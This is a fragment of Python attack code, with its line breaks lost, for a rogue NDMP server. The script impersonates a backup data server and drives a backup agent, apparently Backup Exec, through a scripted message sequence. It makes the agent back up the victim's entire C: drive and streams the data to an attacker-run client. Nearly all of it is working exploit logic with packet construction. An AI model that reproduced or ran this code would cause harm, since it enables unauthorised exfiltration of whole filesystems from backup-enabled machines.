def __init__(self, dma_ip, dsp_ip, dsp_nbname, fake_ip): server_ndmp.dma_ip = dma_ip server_ndmp.dsp_ip = dsp_ip server_ndmp.dsp_nbname = dsp_nbname #server_ndmp.mode = mode server_ndmp.fake_ip = fake_ip self.__sock_server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) self.__sock_server.bind((server_ndmp.HOST,server_ndmp.PORT)) self.__sock_server.listen(1) self.__obj_client_ndmp = client_ndmp(server_ndmp.dsp_nbname, server_ndmp.dsp_ip) self.__do_attack = False t = dynamic_thread("broadcast_fake_dsp", name="fake_dsp01", dsp_nbname=server_ndmp.dsp_nbname, fake_ip=server_ndmp.fake_ip, dma_ip= server_ndmp.dma_ip ) t.start() server_ndmp.threads.append(t) print "[*] Server started"
def attack(self): gen_uuid = "{" + str(uuid.uuid4()) + "}" gen_jobname = "Backup %05d" % random.randint(0, 100000) print "[*] **************" print "[Attacker] Sending Prop [0xf270] to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0xf270)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply f = open('prop_reqf270.xdr') d = f.read() # There are 0xa elements in it. # d[0:4] ? # d[4:] - > Variable array u = xdrlib.Unpacker(d[8:]) # Dictionary of key-value pairs for packing later dct = {} for i in range(0,0xa): k = u.unpack_bytes() v = u.unpack_bytes() dct[k] = v if(dct.has_key('BE_JOB_ID')): dct['BE_JOB_ID'] = gen_uuid if(dct.has_key('BE_JOB_NAME')): dct['BE_JOB_NAME'] = gen_jobname p = xdrlib.Packer() for key in dct.keys(): p.pack_string(key) p.pack_string(dct[key]) a_pkt.pkt.__setitem__('data',"\x00\x00\x00\x0a" +\ "\x00\x00\x00\x0a" +\ p.get_buffer()) q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x80000000)+q self.parse_ndmp(send_data) self.__sock_client.send(send_data) recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) f.close() if self.ndmp_pkt.__getitem__('message_name')[0] == int(0xf270): print "[Attacker] Resp Prop [0xf270] recvd from Client" else: print "[Attacker] ! Expected Prop [0xf270] from Client" self.print_data(self.ndmp_pkt, True) print "[Attacker] Sending CONFIG_GET_HOST_INFO to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0x100)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply #a_pkt.pkt.__setitem__('data',"\x00\x00\x00\x00") q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x80000000)+q self.parse_ndmp(send_data) self.__sock_client.send(send_data) recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) if self.ndmp_pkt.__getitem__('message_name')[0] == int(0x100): print "[Attacker] Resp CONFIG_GET_HOST_INFO recvd from Client" else: print "[Attacker] ! Expected CONFIG_GET_HOST_INFO from Client" self.print_data(self.ndmp_pkt, True) print "[Attacker] Sending CONFIG_GET_SERVER_INFO to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0x108)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply #a_pkt.pkt.__setitem__('data',"\x00\x00\x00\x00") q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x80000000)+q self.parse_ndmp(send_data) self.__sock_client.send(send_data) recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) if self.ndmp_pkt.__getitem__('message_name')[0] == int(0x108): print "[Attacker] Resp CONFIG_GET_SERVER_INFO recvd from Client" else: print "[Attacker] ! Expected CONFIG_GET_SERVER_INFO from Client" self.print_data(self.ndmp_pkt, True) print "[Attacker] Sending MOVER_SET_RECORD_SIZE to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0xa08)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply a_pkt.pkt.__setitem__('data',"\x00\x00\x80\x00") q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x80000000)+q self.parse_ndmp(send_data) self.__sock_client.send(send_data) recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) if self.ndmp_pkt.__getitem__('message_name')[0] == int(0xa08): print "[Attacker] Resp MOVER_SET_RECORD_SIZE recvd from Client" else: print "[Attacker] ! Expected MOVER_SET_RECORD_SIZE from Client" self.print_data(self.ndmp_pkt, True) print "[Attacker] Sending DATA_LISTEN to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0x409)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply a_pkt.pkt.__setitem__('data',"\x00\x00\x00\x01") q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x80000000)+q self.parse_ndmp(send_data) self.__sock_client.send(send_data) recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) do_open_data_stream = False data_listen_data = "\x00" if self.ndmp_pkt.__getitem__('message_name')[0] == int(0x409): print "[Attacker] Resp DATA_LISTEN recvd from Client" data_listen_data = self.ndmp_pkt.__getitem__('data') do_open_data_stream = True #print "TCP communication port %d" % self.ndmp_pkt.__getitem__('data')[0] else: print "[Attacker] ! Expected DATA_LISTEN from Client" self.print_data(self.ndmp_pkt, True) #DATA_START_BACKUP Req asa = raw_input("Start debugging at client..hit?") if(do_open_data_stream): #data_listen_data = self.ndmp_pkt.__getitem__('data')[0] #self.print_data(data_listen_data, True) attack_ip = "" attack_ip = str(struct.unpack(">B", data_listen_data[8:9])[0]) attack_ip += "." + str(struct.unpack(">B", data_listen_data[9:10])[0]) attack_ip += "." + str(struct.unpack(">B", data_listen_data[10:11])[0]) attack_ip += "." + str(struct.unpack(">B", data_listen_data[11:12])[0]) attack_port = struct.unpack(">I", data_listen_data[12:])[0] # Can check whether the attack_ip = dsp_ip # Not doing it now t = dynamic_thread("start_data_client",name="dataclient01",attack_ip=attack_ip , attack_port=attack_port) t.start() print "[Attacker] Sending DATA_START_BACKUP to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0x401)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply f = open("data_start_bkup_req401.xdr") d = f.read() u = xdrlib.Unpacker(d[12:]) dct = {} for i in range(0,0x14d): k = u.unpack_bytes() v = u.unpack_bytes() dct[k] = v if(dct.has_key('JOBNAME')): dct['JOBNAME'] = gen_jobname if(dct.has_key('JOB_INSTANCE_GUID')): dct['JOB_INSTANCE_GUID'] = gen_uuid #"\\RevrseEngg.backupserver.ivizindia.com\C:\scite\*.*",s,v0,t0,l0,n0,f0 if(dct.has_key('FILESYSTEM')): dct['FILESYSTEM'] = "\"\\\\" + self.__dsp_nbname + "\\C:\\*.*\",s,v0,t0,l0,n0,f0" p = xdrlib.Packer() data_buf = "\x00\x00\x00\x04" data_buf += "dump" data_buf += "\x00\x00\x01\x4d" # Dictionary keeps unique keys p.pack_string('USERNAME') p.pack_string('') if(dct.has_key('NOPASSWORD')): p.pack_string('NOPASSWORD') p.pack_string(dct['NOPASSWORD']) dct.pop('NOPASSWORD') if(dct.has_key('USERNAME')): p.pack_string('USERNAME') p.pack_string(dct['USERNAME']) dct.pop('USERNAME') if(dct.has_key('PASSWORD')): p.pack_string('PASSWORD') p.pack_string(dct['PASSWORD']) dct.pop('PASSWORD') for key in dct.keys(): p.pack_string(key) p.pack_string(dct[key]) data_buf += p.get_buffer() pkt_full_length = len(data_buf) pkt_sent_len = 0 initialized = False PACKET_SIZE_LIMIT = 4000 while(pkt_sent_len < pkt_full_length): #Packet size limit is 4000 bytes if(initialized == False): # 28 bytes header + 3972 data # First packet pkt_sent_len = PACKET_SIZE_LIMIT - 28 a_pkt.pkt.__setitem__('data',data_buf[:pkt_sent_len]) q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x00000000)+q initialized = True print "[*] Sending initial 0x401 packet" else: if((pkt_sent_len + (PACKET_SIZE_LIMIT - 4)) < pkt_full_length ): #interim packets old_pkt_sent_len = pkt_sent_len pkt_sent_len = pkt_sent_len + (PACKET_SIZE_LIMIT - 4) q = data_buf[old_pkt_sent_len:pkt_sent_len] send_data = struct.pack(">L",len(q)+0x00000000)+q print "[*] Sending interim 0x401 packet" else: #last packet q = data_buf[pkt_sent_len:] send_data = struct.pack(">L",len(q)+0x80000000)+q pkt_sent_len = pkt_full_length print "[*] Sending final 0x401 packet" self.__sock_client.send(send_data) f.close() recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) if self.ndmp_pkt.__getitem__('message_name')[0] == int(0x401): print "[Attacker] Resp DATA_START_BACKUP recvd from Client" #print "TCP communication port %d" % self.ndmp_pkt.__getitem__('data')[0] else: print "[Attacker] ! Expected DATA_START_BACKUP from Client" self.print_data(self.ndmp_pkt, True) print "[Attacker] Sending DATA_GET_STATE to client" a_pkt = ndmp() a_pkt.pkt.__setitem__('message_name',int(0x400)) a_pkt.pkt.__setitem__('sequence',self.ndmp_pkt.__getitem__('sequence')[0]) #Copying the seq from the reply #a_pkt.pkt.__setitem__('data',"\x00\x00\x00\x00") q = a_pkt.dump() send_data = struct.pack(">L",len(q)+0x80000000)+q self.parse_ndmp(send_data) self.__sock_client.send(send_data) recv_data = self.__sock_client.recv(1024) self.ndmp_pkt = self.parse_ndmp(recv_data) if self.ndmp_pkt.__getitem__('message_name')[0] == int(0x400): print "[Attacker] Resp DATA_GET_STATE recvd from Client" else: print "[Attacker] ! Expected DATA_GET_STATE from Client" self.print_data(self.ndmp_pkt, True) print "Reached Stage 2 "